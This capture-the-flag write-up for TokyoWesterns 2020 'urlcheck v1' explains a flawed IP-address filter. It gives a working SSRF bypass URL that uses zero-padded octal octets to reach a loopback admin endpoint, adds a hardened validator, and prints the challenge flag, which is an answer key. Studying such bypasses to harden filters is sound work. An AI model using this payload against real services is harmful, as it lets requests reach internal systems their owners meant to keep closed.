urlcheck v1 [98 points] (160 solves)

TokyoWesterns CTF 6th 2020 - solved together with dominikoso

Files:

Part 0: research

So, we need to make an SSRF request to /admin-status. Cool.

Part 1: Win

It should be noted that this regex matches more than 3 digits per octet.

import re

# \d+ accepts any number of digits per group, including leading zeros
re.compile(r'\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

Next, we convert each group to int.

ip = list(map(int, matches.groups()))
if any(i > 255 for i in ip):
    return False

And finally check the IP (in a very dodgy way: the 172 branch uses `or`, so it rejects every 172.x.x.x address rather than just 172.16.0.0/12).

if ip[0] in [0, 10, 127] \
    or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \
    or (ip[0] == 169 and ip[1] == 254) \
    or (ip[0] == 192 and ip[1] == 168):
    return False

It's not too hard to look for common IP bypasses. The octal form worked out in this case: `int()` parses each zero-padded group as decimal (0...0177 becomes 177, which passes every check above), while the HTTP client that performs the request treats a leading-zero octet as octal (0177 = 127), so the request lands on 127.0.0.1. Final request: http://0000000000000000177.0000000000000000000000.00000000000000000000000000.1/admin-status.
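To make the gap concrete, here is the challenge's check as reproduced in this writeup next to a hardened version (added example, not the challenge's own code; `hardened_check` and `CANONICAL_RE` are names chosen here). The hardened version insists on canonical dotted-decimal (1-3 digits, no leading zeros) before handing the string to `ipaddress`, so decimal and octal readings can no longer disagree.

```python
import ipaddress
import re

# Check as shown in the writeup: \d+ swallows zero-padded groups, int()
# reads them as decimal, and the 172 branch's "or" is always true.
FLAWED_RE = re.compile(r'\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def flawed_check(host):
    m = FLAWED_RE.match(host)
    if not m:
        return False
    ip = list(map(int, m.groups()))
    if any(i > 255 for i in ip):
        return False
    if ip[0] in [0, 10, 127] \
        or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \
        or (ip[0] == 169 and ip[1] == 254) \
        or (ip[0] == 192 and ip[1] == 168):
        return False
    return True

# Hardened variant (added here): only canonical octets 0-255 without leading
# zeros are accepted, so "0177" or "0000000000000000177" never reach int().
OCTET = r'(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)'
CANONICAL_RE = re.compile(r'\A' + OCTET + r'(?:\.' + OCTET + r'){3}\Z')

def hardened_check(host):
    if not CANONICAL_RE.match(host):
        return False
    addr = ipaddress.IPv4Address(host)
    # Let the standard library classify the ranges instead of hand-rolled
    # comparisons; this also covers 172.16/12 correctly and 100.64/10, 0/8 etc.
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)

# Host from the final request in the writeup, used as sample input.
OCTAL_HOST = "0000000000000000177.0000000000000000000000.00000000000000000000000000.1"

if __name__ == "__main__":
    for h in (OCTAL_HOST, "127.0.0.1", "172.20.0.5", "8.8.8.8"):
        print(f"{h}: flawed={flawed_check(h)} hardened={hardened_check(h)}")
```

The canonical-form regex is the part that matters: once the only accepted spelling of an address is the one the HTTP client will also read as decimal, the validator and the client agree on where the request goes.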

Flag: TWCTF{4r3_y0u_r34dy?n3x7_57463_15_r34l_55rf!}